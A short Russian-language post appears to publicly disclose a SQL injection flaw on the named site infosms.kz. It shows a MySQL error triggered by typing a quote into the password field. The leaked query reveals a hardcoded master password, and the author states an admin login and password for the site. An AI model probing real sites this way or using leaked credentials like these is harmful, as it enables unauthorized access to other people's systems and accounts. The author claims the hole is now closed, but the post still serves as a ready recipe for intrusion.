Уязвимость сайта infosms.kz

Решил, выложить данную уязвимость в паблик, так как уязвимость была прикрыта переделкой сайта...

Уязвимость банальная, при вводе кавычки в поле ввода пароля получаем ошибку:

1. Database_Exception [ 1064 ]: You have an error IN your SQL syntax; CHECK
2. the manual that corresponds TO your MySQL server version FOR the RIGHT
3. syntax TO USE near '"' = 'i_am_GOD_4')'
4. at line 1 [ SELECT `login`, `loc_id`, `id`, `role`, `active`, `name`, `last_name`, `second_name`,
5. `sex`, `birth_date` FROM `usr_par` WHERE (`login`='6' or `id`='6') and
6. (`pass`='45747d6049e758821c3aaf096aeb84ed' or ''"' = 'i_am_GOD_4') ]

Из запроса видно, что можно зайти на сайт, под любым логином, используя пароль админа:  i_am_GOD_4 

Методом тыка, логин: Admin, пароль:  i_am_GOD_4